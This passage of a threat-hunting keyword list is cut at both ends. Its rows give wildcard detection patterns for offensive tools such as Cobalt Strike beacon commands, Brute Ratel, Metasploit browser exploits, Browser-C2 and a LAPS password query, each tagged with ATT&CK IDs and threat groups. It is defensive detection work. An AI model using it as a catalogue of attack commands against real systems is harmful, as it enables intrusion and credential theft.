This can be useful in various scenarios.,T1055 - T1027 - T1071 - T1059,TA0002 - TA0005 - TA0011,N/A,N/A,Exploitation tools,https://github.com/BorjaMerino/Pazuzu,1,1,N/A,N/A,3,213,70,2020-08-04T18:49:36Z,2015-10-05T12:23:17Z -*Bot_MSF_Exp_*.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Bot_Python_Poc_Log4j2_VMwareHorizon.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*bpassthehash*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*bpowerpick*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bpsexec_command*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*bpsexec_command*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - 
APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bpsexec_psh*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*bpsinject*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*bpsinject*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*brave* --headless * --dump-dom http*,greyware_tool_keyword,chromium,Headless Chromium allows running Chromium in a headless/server environment - downloading a file - abused by attackers,T1553.002 - T1059.005 - T1071.001 - T1561,TA0002,N/A,N/A,Defense 
Evasion,https://redcanary.com/blog/intelligence-insights-june-2023/,1,0,N/A,4,5,N/A,N/A,N/A,N/A -"*brave.exe* --load-extension=""*\Users\*\Appdata\Local\Temp\*",greyware_tool_keyword,chromium,The --load-extension switch allows the source to specify a target directory to load as an extension. This gives malware the opportunity to start a new browser window with their malicious extension loaded.,T1136.001 - T1176 - T1059.007,TA0003 - TA0004 - TA0005,N/A,N/A,Exploitation tools,https://www.mandiant.com/resources/blog/lnk-between-browsers,1,0,risk of false positives,7,10,N/A,N/A,N/A,N/A -*brc4_ldap_sentinel.py*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,1,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*Brc4ConfigExtractor.exe*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*Brc4DecodeString*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*breg add *HK*,offensive_tool_keyword,cobaltstrike,Cobalt Strike beacon object file that allows 
you to query and make changes to the Windows Registry,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ausecwa/bof-registry,1,0,N/A,10,10,17,7,2021-02-11T04:38:28Z,2021-01-29T05:07:47Z -*breg delete *HK*,offensive_tool_keyword,cobaltstrike,Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ausecwa/bof-registry,1,0,N/A,10,10,17,7,2021-02-11T04:38:28Z,2021-01-29T05:07:47Z -*breg query *HK*,offensive_tool_keyword,cobaltstrike,Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ausecwa/bof-registry,1,0,N/A,10,10,17,7,2021-02-11T04:38:28Z,2021-01-29T05:07:47Z -*breg_add_string_value*,offensive_tool_keyword,cobaltstrike,Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ausecwa/bof-registry,1,1,N/A,10,10,17,7,2021-02-11T04:38:28Z,2021-01-29T05:07:47Z -*bremote_exec*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*breviaries 
-Properties DnsHostName*ms-Mcs-AdmPwd*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*brew install sniffer*,offensive_tool_keyword,sniffer,A modern alternative network traffic sniffer.,T1040 - T1052.001 - T1046 - T1552.002,TA0011 - TA0007 - TA0005,N/A,N/A,Sniffing & Spoofing,https://github.com/chenjiandongx/sniffer,1,0,N/A,N/A,7,668,58,2022-07-27T15:13:57Z,2021-11-08T15:36:03Z -*bropper.py *,offensive_tool_keyword,bropper,An automatic Blind ROP exploitation tool ,T1068 - T1059.003 - T1140,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Hakumarachi/Bropper,1,0,N/A,7,2,175,18,2023-06-09T12:40:05Z,2023-01-20T14:09:19Z -*Bropper-main.zip*,offensive_tool_keyword,bropper,An automatic Blind ROP exploitation tool ,T1068 - T1059.003 - T1140,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Hakumarachi/Bropper,1,1,N/A,7,2,175,18,2023-06-09T12:40:05Z,2023-01-20T14:09:19Z -*browser.keylog_file.write*,offensive_tool_keyword,cuddlephish,Weaponized Browser-in-the-Middle (BitM) for Penetration Testers,T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001,TA0009 - TA0006,N/A,N/A,Sniffing & Spoofing,https://github.com/fkasler/cuddlephish,1,0,N/A,10,2,152,10,2023-09-06T12:25:08Z,2023-08-02T14:30:41Z -*browser_##*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*browser_autopwn*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*browser_autopwn*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*browser_autopwn2_spec.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*browser_exploit.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*browser_exploit_server_spec.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*BrowserBookmarkDiscovery_BrowserHistory.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Browser-C2.git*,offensive_tool_keyword,Browser-C2,Post Exploitation agent which uses a browser to do C2 operations.,T1105 - T1043 - T1102,TA0003 - TA0005 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/Browser-C2,1,1,N/A,10,10,99,32,2018-05-25T15:12:21Z,2018-05-22T14:33:24Z -*Browser-C2-master.zip*,offensive_tool_keyword,Browser-C2,Post Exploitation agent which uses a browser to do C2 operations.,T1105 - T1043 - T1102,TA0003 - TA0005 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/Browser-C2,1,1,N/A,10,10,99,32,2018-05-25T15:12:21Z,2018-05-22T14:33:24Z -*browserexploitserver.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*BrowserGhost-N*.exe*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 